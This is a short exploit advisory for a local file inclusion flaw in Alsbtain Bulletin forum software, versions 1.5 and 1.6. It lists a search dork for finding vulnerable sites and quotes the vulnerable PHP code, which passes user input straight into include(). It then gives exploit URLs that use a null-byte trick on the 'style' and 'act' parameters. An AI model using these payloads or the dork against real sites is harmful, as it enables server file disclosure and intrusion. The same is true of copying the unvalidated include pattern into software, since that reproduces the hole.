# Title      : Alsbtain Bulletin (index.php) Local File include
# Author     : Null H4ck3r
# Product    : Alsbtain ( Alsbtain Bulletin )
# Vendor     : http://www.alsbtain.net/ipb/
# Date       : 25/10/2011
# Version    : 1.5 , 1.6
# Tested on  : windows
# Dork       : Powered By Alsbtain Bulletin 1.6 & Powered By Alsbtain Bulletin 1.5
# Contact    : Null.H4ck3r@Yahoo.com
================================================================
Vuln file : index.php
~~~~~~~~~~~~~~~~~~~~~~~
Vuln code:

$act=str_replace('idsb', '&id=', $_GET['act']);
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: ?act=".$act );}
include("styles/$style/header.php");
include("includes/stats/addhome.php");
include("styles/$style/menu_start.php");

if(is_file("includes/".$_GET['act'].".php")){
include("includes/".$_GET['act'].".php");
} else { include("includes/home.php"); }
~~~~~~~~~~~~~~~~~~~~~~~

Exploit: 

http://localhost/index.php?style=[LFI]%00
http://localhost/index.php?act=[LFI]%00

===============================================================

That's it xD